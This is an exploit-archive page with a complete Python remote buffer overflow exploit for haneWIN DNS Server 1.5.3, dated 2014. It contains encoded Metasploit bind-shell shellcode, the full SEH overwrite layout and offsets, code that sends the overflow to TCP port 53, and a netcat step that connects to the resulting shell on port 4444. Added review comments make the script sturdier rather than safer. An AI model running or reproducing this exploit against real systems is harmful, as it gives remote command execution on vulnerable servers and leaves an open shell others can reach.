haneWIN DNS Server 1.5.3 – Remote Buffer Overflow (SEH)

  • Author: Dario Estrada
    Date: 2014-01-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/31260/
  • #!/usr/bin/python
     
    # Exploit Title: haneWIN DNS Server (SEH)
    # Author: Dario Estrada (dash) https://intrusionlabs.org
    # Date: 2014-01-29
    # Version: haneWIN DNS Server 1.5.3
    # Vendor Homepage: http://www.hanewin.net/
    # Vulnerable app link:http://www.hanewin.net/dns-e.htm
    # Tested on: Windows XP SP3
    # Thanks to God, to my family and all my friends for always being there
    #
    # Description:
    # A SEH overflow occurs when a large amount of data (here a ~2.9 KB buffer
    # sent to TCP port 53) is delivered to the server
    #
    import os
    import socket
    import subprocess
    import sys
    import time
     
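    # Usage banner; the script takes exactly one positional argument, the
    # target host (an IPv4 literal or a resolvable name).
    usage = "\nUsage: " + sys.argv[0] + " <host> \n"
     
    if len(sys.argv) < 2:
        print(usage)
        # A usage error is a failure: exit non-zero so callers and wrappers
        # notice (the original exited 0 here).
        sys.exit(1)
     
    host = sys.argv[1]
    # The host is later handed to a follow-up `nc` command line, so reject
    # anything outside the characters a hostname / IPv4 literal can contain.
    # That closes off argument/shell injection if this script is ever driven by
    # a wrapper rather than typed by hand.
    if not host or not all(c.isalnum() or c in ".-_" for c in host):
        print("[!] Invalid host: " + repr(host))
        sys.exit(1)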
    
    # Second stage: the raw shellcode the SEH chain below jumps back to.
    # Generated with the Metasploit command recorded inside the parentheses
    # (msfpayload windows/shell_bind_tcp piped through msfencode), with
    # \x00 \xff \x0a \x0d excluded as bad characters. 24 lines of 15 bytes plus
    # a final 8-byte line = 368 bytes, so it fits well inside the 2324-byte
    # region that precedes the overwritten SEH record.
    #
    # NOTE(review): this is an opaque encoded blob. A bind shell listens on the
    # target and is reachable by anyone who can hit that port, not just the
    # operator; the rest of the script assumes the bind port is 4444
    # (presumably msfpayload's default LPORT - confirm). Prefer to regenerate the
    # payload yourself (msfvenom today) rather than trusting a pasted blob, and
    # check that its bind port matches what the script connects to.
    shellcode = (
    #msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
    "\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    "\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
    "\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
    "\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
    "\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
    "\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
    "\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
    "\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
    "\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
    "\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
    "\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
    "\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
    "\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
    "\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
    "\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
    "\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
    "\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
    "\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
    "\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
    "\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
    "\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
    "\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
    "\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
    "\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
    "\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
    )
    
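    # SEH overwrite layout (offsets in bytes from the start of `buff`):
    #   [0    ..2324) shellcode, then 'A' filler up to the SEH record
    #   [2324 ..2328) nSEH   : EB 06 90 90  = short jmp +6, hops over the SEH
    #                          handler address onto `opcode`
    #   [2328 ..2332) SEH    : 0x7ffc07d1 (little-endian) handler address
    #   [2332 ..2337) opcode : E9 DF F6 FF FF = jmp rel32 -0x921 (-2337), i.e.
    #                          from offset 2337 back to offset 0, the shellcode
    #   [2337 ..2937) padding, presumably so the write runs far enough to
    #                 raise the exception that dispatches the handler
    #
    # NOTE(review): the SEH value is a fixed 32-bit pointer; the header says the
    # exploit was only tested on Windows XP SP3 and nothing here adapts it to
    # another build (presumably a pop/pop/ret there - confirm before reuse).
    nSEH = '\xeb\x06\x90\x90'
    SEH = '\xd1\x07\xfc\x7f'
    opcode = "\xe9\xdf\xf6\xff\xff"

    # The rel32 in `opcode` only lands on the shellcode if the shellcode starts
    # at offset 0 and nSEH sits at exactly 2324. If the payload is ever swapped
    # for one longer than that, 'A' * (negative) silently becomes '' and every
    # offset shifts - fail loudly instead.
    SEH_OFFSET = 2324
    if len(shellcode) > SEH_OFFSET:
        print("[!] shellcode is %d bytes, must be <= %d" % (len(shellcode), SEH_OFFSET))
        sys.exit(1)
    junk = 'A' * (SEH_OFFSET - len(shellcode))
    padding = 'A' * 600

    buff = shellcode + junk + nSEH + SEH + opcode + padding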
    
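    print("[+] Connecting to %s:53" % (host))
    try:
        # Resolve once: socket.connect() accepts a hostname, but `nc -n` below
        # is numeric-only, so a hostname would exploit fine and then fail to
        # reach the shell. Use the resolved IPv4 address for both steps.
        target_ip = socket.gethostbyname(host)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)  # don't hang forever on a filtered port
        try:
            s.connect((target_ip, 53))
            print("[*] Sending payload.." + " shellcode: " + str(len(shellcode)))
            # sendall(): plain send() may write only part of the ~2.9 KB buffer,
            # which would leave the SEH record short and the overflow incomplete.
            s.sendall(buff)
            # "Sent" only means the bytes left the socket, not that it fired.
            print("[*] Exploit Sent Successfully!")
        finally:
            s.close()
    except socket.error as e:
        # Only socket failures (resolution, connect, timeout, send) are handled
        # here. Ctrl-C and genuine bugs propagate instead of being reported as
        # "could not connect", and the real error is shown rather than hidden.
        print("[!] Could not connect to %s:53 (%s)\r" % (host, e))
        sys.exit(1)

    print("[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r")
    time.sleep(5)
    # Bind shell on the target: anyone who can reach tcp/4444 can use it, not
    # just us. The argv-supplied host is passed to nc as an argument vector,
    # not through a shell, so it cannot smuggle extra commands.
    subprocess.call(["nc", "-n", target_ip, "4444"])
    sys.exit(0)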